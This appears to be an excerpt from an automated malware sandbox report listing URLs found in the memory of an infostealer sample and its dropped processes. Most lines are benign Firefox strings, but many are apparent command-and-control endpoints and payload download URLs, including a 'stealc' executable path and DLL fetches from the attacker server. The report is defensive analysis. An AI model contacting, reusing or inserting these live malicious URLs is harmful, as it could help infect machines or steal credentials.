Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedgg=
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phprsi
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=
Source: axplong.exe, 00000014.00000002.3324088102.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/a=t
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeT5
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exeb3
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exej4
Source: explorti.exe, 00000013.00000002.3323751000.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000013.00000002.3323751000.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe&
Source: explorti.exe, 00000013.00000002.3323751000.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe-
Source: explorti.exe, 00000013.00000002.3323751000.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe/
Source: explorti.exe, 00000013.00000002.3323751000.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe13
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/D
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/G
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php/b3
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php?b
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php?e
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpOb
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpOe
Source: explorti.exe, 00000013.00000003.2933603717.00000000011DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpX
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_b#
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_e#a
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpf
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpob
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoc
Source: explorti.exe, 00000013.00000002.3323751000.00000000011C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phprsion
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1Z
Source: explorti.exe, 00000013.00000002.3323751000.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ta
Source: file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2493886983.00000000005AD000.00000040.00000001.01000000.00000003.sdmp, 9fa327eb6c.exe, 00000015.00000002.2718319930.000000000253E000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php#(n
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php/1
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.000000000259B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php3
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpM42
Source: file.exe, 00000000.00000002.2514256490.0000000028D6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpT
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.000000000259B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpU
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.000000000259B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpi
Source: file.exe, 00000000.00000002.2493886983.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2520264029.00000000350C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpr
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllO
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllc
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll5
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dllv:?
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll1
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllV;
Source: file.exe, 00000000.00000002.2493886983.000000000046A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dllZ
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/;1
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/=1
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/V
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.000000000259B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/dod
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/e
Source: file.exe, 00000000.00000002.2493886983.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 9fa327eb6c.exe, 00000015.00000002.2718319930.000000000253E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31E;
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31O
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31s1
Source: file.exe, 00000000.00000002.2496023494.000000000272E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31yd
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/JSONFile.sys.mjs
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gr
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 0000001F.00000002.3022925939.000001B40003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2994122055.000001B116B97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967893682.000001B112B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2978323155.000001B11559D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2921837899.000001B1155DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B1175C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B11755B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939237933.000001B1068C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2956400366.000001B1068B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B1175A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2979155172.000001B115703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3006356102.000001B11BF36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B11758D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940922435.000001B1068BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2954167196.000001B1066D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: file.exe, file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001F.00000002.2989528701.000001B11689F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989528701.000001B116803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2978854207.000001B115687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001F.00000002.2980952151.000001B115B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulgetAttrDataAsync:
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ExtensionPrefere
Source: file.exe, 00000000.00000002.2520774989.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001F.00000002.2970664695.000001B1136C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001F.00000002.3004882202.000001B11BB39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
